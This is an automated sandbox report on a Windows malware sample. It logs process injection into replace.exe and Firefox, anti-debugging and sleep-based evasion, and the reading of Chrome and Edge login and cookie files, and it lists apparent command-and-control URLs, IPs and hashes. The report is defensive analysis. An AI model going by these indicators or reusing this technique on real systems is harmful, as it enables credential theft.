Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 5030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 7060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 8060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 81D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 91D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\replace.exe	API coverage: 3.7 %

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe TID: 7876	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 7288	Thread sleep count: 121 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 7288	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 7288	Thread sleep count: 9852 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 7288	Thread sleep time: -19704000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep time: -58500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\replace.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\replace.exe	Last function: Thread delayed

Source: MBLUUsWuClSd.exe, 00000005.00000002.23442345473.000000000146F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: replace.exe, 00000004.00000002.23441797412.0000000002BA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.21575564801.0000024AE6CE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtOpenFile: Direct from: 0x77DA2CEC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtAllocateVirtualMemory: Direct from: 0x77DA3BBC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQueryInformationToken: Direct from: 0x77DA2BCC	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtQueueApcThread: Indirect: 0x17BF497	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtCreateFile: Direct from: 0x77DA2F0C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtAllocateVirtualMemory: Direct from: 0x77DA2B0C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtOpenSection: Direct from: 0x77DA2D2C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtProtectVirtualMemory: Direct from: 0x77D97A4E	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x5D298FD	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtTerminateThread: Direct from: 0x7FFC17602651	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtMapViewOfSection: Direct from: 0x77DA2C3C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtResumeThread: Direct from: 0x77DA35CC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtAllocateVirtualMemory: Direct from: 0x77DA2B1C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtSetInformationProcess: Direct from: 0x77DA2B7C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtNotifyChangeKey: Direct from: 0x77DA3B4C	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x5D2972E	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x5D31488	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtOpenKeyEx: Direct from: 0x77DA2ABC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQueryInformationProcess: Direct from: 0x77DA2B46	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtSuspendThread: Indirect: 0x17C3A29	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtResumeThread: Indirect: 0x17C3D49	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtDelayExecution: Direct from: 0x77DA2CFC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtSetInformationThread: Direct from: 0x77D96319	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQuerySystemInformation: Direct from: 0x77DA2D1C	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtResumeThread: Direct from: 0x5D29974	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtDeviceIoControlFile: Direct from: 0x77DA2A0C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQuerySystemInformation: Direct from: 0x77DA47EC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtCreateKey: Direct from: 0x77DA2B8C	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtClose: Indirect: 0x17BF52B
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtSetInformationThread: Direct from: 0x77DA2A6C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQueryAttributesFile: Direct from: 0x77DA2D8C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtClose: Direct from: 0x77DA2A8C
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtProtectVirtualMemory: Direct from: 0x77DA2EBC	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtSetContextThread: Indirect: 0x17C3709	Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Thread register set: target process: 6744			Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Thread register set: target process: 3176			Jump to behavior

Source: RAVCpl64.exe, 00000003.00000002.23443863823.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.21205048514.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23444493476.0000000001D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: RAVCpl64.exe, 00000003.00000002.23443863823.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.21205048514.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23444493476.0000000001D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RAVCpl64.exe, 00000003.00000002.23443863823.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.21205048514.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23444493476.0000000001D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Queries volume information: C:\Users\user\Desktop\SOA SIL TL382920.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
217.160.0.27	concept.pink	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
37.140.192.23	www.neuro-practicum.online	Russian Federation	197695	AS-REGRU	false
121.254.178.239	www.it9.shop	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
184.94.215.26	www.tribevas.online	United States	394896	VXCHNGE-NC01US	false
76.223.105.230	stratogent.info	United States	16509	AMAZON-02US	false
199.59.243.227	www.online-dating28.xyz	United States	395082	BODIS-NJUS	true
38.55.251.233	www.kuaimaolife.shop	United States	174	COGENT-174US	false
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	false
194.58.112.174	www.synd.fun	Russian Federation	197695	AS-REGRU	false
3.33.130.190	07t90q.vip	United States	8987	AMAZONEXPANSIONGB	false
161.97.168.245	www.acuarelacr.buzz	United States	51167	CONTABODE	false
185.104.28.27	www.toteforcar.site	Netherlands	206281	AS-ZXCSNL	false

Windows Analysis Report SOA SIL TL382920.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SOA SIL TL382920.exe

Malware Threat Intel
Provided by

Name	Malicious	Reputation
http://www.neuro-practicum.online/dndz/	false	unknown
http://www.it9.shop/acqm/?0zu8A=o2yln6&VzK4o8Jx=hOk1k3UNcVwpG+EJEDicqQpIOObLS/TgyY32GlBOoCoiXDXAZ6sWDP89y5CwOebPWohVlvJHYhDsteptd/L7YydfwpVPpt2oIMR5Kfz9plXO/BQcfDKFtuw=	false	unknown
http://www.nodigitalsmoke.org/pnbu/	false	unknown
http://www.stratogent.info/f3n5/?VzK4o8Jx=dhj1q08La8WFEWo3xk5bQlyPjuL1dgahmkpS3NRsd6Y/mAIsEkGjeuU1SXWIZ8LAwVs2eJKJ0+NM44t35YuY5s8XjK0+kf3wgV05m6WJetyMkfq7N/qTBt8=&0zu8A=o2yln6	false	unknown
http://www.acuarelacr.buzz/xlle/?VzK4o8Jx=e/yKpeJOjOfK3ogdJaNPolEHTgG8UOeOD7iGn6rK8RtZqhJ0uS/fq3wrSOZm1/LpQx9nm8RE0LQ7pT1GOQTyowfApUFnsluh2+dA7bAmT6aj2geZl7SaSIo=&0zu8A=o2yln6	false	unknown
http://www.artherapy.online/xha2/	false	unknown
http://www.kuaimaolife.shop/j39u/?VzK4o8Jx=Bz1f0c7bYWyPEXgQGmGeUr0iAf+T5y0lnFtnj2cpqvgmCRIzB1oQIQU/LvP87UgGwTfaSD+LVTW+9AK3Nxg5tSpiWXbGTNqEKdm6W6Th2Oxx8WLr56YoU0o=&0zu8A=o2yln6	false	unknown
http://www.stratogent.info/f3n5/	false	unknown
http://www.concept.pink/4yov/	false	unknown
http://www.toteforcar.site/dh2t/	false	unknown
http://www.synd.fun/pisq/?VzK4o8Jx=H7+I56BzzgTO14iYyfpq/0TXLnkw0DU3mxqOdQDMcBjOXdIUFfgl3gtbee+L6DVRaRQz5ZravCeTSBENiaLmUfkQqiezYkWa8l0+pkZP8o0fG616lfZJ+EU=&0zu8A=o2yln6	false	unknown
http://www.redlakedispensery.net/phw5/?0zu8A=o2yln6&VzK4o8Jx=0nIKn1KaCpmASYJA4heXTZJ4jJXOLVPKLZ7pkMbHJLxIA/G7tzth6jzDxIdIFtsfCbXgmV5eiC0y9vkRZyS1XzB4D/cnp4pLqlHudh8ra46zD/kGcOWFXek=	false	unknown
http://www.redlakedispensery.net/phw5/	false	unknown
http://www.acuarelacr.buzz/xlle/	false	unknown
http://www.online-dating28.xyz/6nb6/	false	unknown
http://www.ara-store.com/vbsv/	false	unknown
http://www.neuro-practicum.online/dndz/?VzK4o8Jx=yDZaovUERiFyto7X7qjvD9MpBTu9Oa8KDn0njxLOrnMFAtvfChH9CxwY1KA18WTPaaKEsGuRWrl0dmOTwKqBuB4/VF8aV5DH590ef19Cm2H2f9K3TYb4rxM=&0zu8A=o2yln6	false	unknown
http://www.tribevas.online/io0i/?0zu8A=o2yln6&VzK4o8Jx=SDiZucYNl7hAWjD3kY1F3Wh8SSqKLzQrPgO87aM6gvawjY1J8DLcjr26gXoQ9oM68w0z/Zj56CIgKdiiaxfLyhFp6oFJlK6eDMjbU8To92G67g984b8BKfg=	false	unknown
http://www.tribevas.online/io0i/	false	unknown
http://www.07t90q.vip/9eeu/?VzK4o8Jx=sYxoUF2rFRCkhaAkYvMCVRWDMjjY140d56kaE+tBLdvFK0LLAdAC/HAPE2DtjqQpoemNjozj05nG5pG/fmy7ZInj0cRDZa4AaOoOz07zrXAoLhIj+j079Eo=&0zu8A=o2yln6	false	unknown
http://www.kuaimaolife.shop/j39u/	false	unknown
http://www.synd.fun/pisq/	false	unknown
http://www.ara-store.com/vbsv/?VzK4o8Jx=bE1tu4Njqer8fYE3ogT5h7aBRb2mTTstgFdh6ULQtUw7pAI4rpm78pT6sJrtnBlXzUrAExT6FvXu50MEINd+YE6s/Zqjf6ffoiebp1emg4fruBFCNZ4S/qE=&0zu8A=o2yln6	false	unknown
http://www.nodigitalsmoke.org/pnbu/?VzK4o8Jx=PMosseOB4ogJQUQqTcR9kz6RlTRioPzkM9evra3bwBIimbDRItYfTtmn+Yd6ynIhbdr7j07NPWQxaS6b0vcIX3tyVS9+K21fIwIr7IsLGACriLVoa4wujys=&0zu8A=o2yln6	false	unknown
http://www.online-dating28.xyz/6nb6/?VzK4o8Jx=3cQdvvjXbDmN7AD1N3EtkTKSkRGpjOZJD5QOEJ2ov7AVnEoT92w2clvWuemcxfAXa005+24inGIyqDI1tlEn9qii/G7LnY+t45dZlk7rRI6PB0gsuL5FdqU=&0zu8A=o2yln6	false	unknown
http://www.concept.pink/4yov/?VzK4o8Jx=wLmY7AOB32o0S2u43NcX1Hs/A4Ddj7cy6rFAsgDZdNn+sW1g/TF+eJLR19ZQOPzynTi6ZGviANY3o1+5ycRVlJFFydx+2g9CgM5kEaITnei6fXkYmlY6f3w=&0zu8A=o2yln6	false	unknown
http://www.artherapy.online/xha2/?VzK4o8Jx=Rj3U+6DKgT5y3eE2BMi55/myWWswXqjiYm6dEeLSFSW8ImASiPiK/Z97R8zSc/+3mi0fAgijIiRKCB5FCR8rSXkZ7dd1+8Uof6hMEnAJapLXT04qmHdwDH0=&0zu8A=o2yln6	false	unknown
http://www.toteforcar.site/dh2t/?VzK4o8Jx=OuJ8gnv9Mf0seMPZwgWqdoiXcL8RlvinjfaO7Y1P7N6K2HIOPUsL5gVusZwNUZykZEqB/DbtgQZV6EtzKFIFDF8htWObdeNACruwjJyoWYmCvw6DdWzPF9Q=&0zu8A=o2yln6	false	unknown
http://www.it9.shop/acqm/	false	unknown

ID:	1527911
Product:	CloudBasic
Start time:	11:48:13
Start date:	07.10.2024
Sample:	SOA SIL TL382920.bat
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	caec46aaace8e50a9763dffc6c4acf0e
SHA1:	c22d85132ebd62cdf65ced2b203dca7f61490b89
SHA256:	664f584ad45e11d7afe3e4bb326959f6041653f22115327800341fa33eb19080
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOA SIL TL382920.exe.log	ASCII text, with CRLF line terminators	0C6917F1E76EBEA275472081BC96A4B1	F3106955924E1018B3C0E449368897113BC0442C	669CCD2D7C3E58DF40AB95468BDEB8F2F6894A8E013766F05BAE86DFBE29BB13
C:\Users\user\AppData\Local\Temp\59F79305l7	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6	17091CB4BC9C6E80CA91C12E0BBA56F4	ED7E485630B1245C7AE963FB02C899BF141DB578	551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814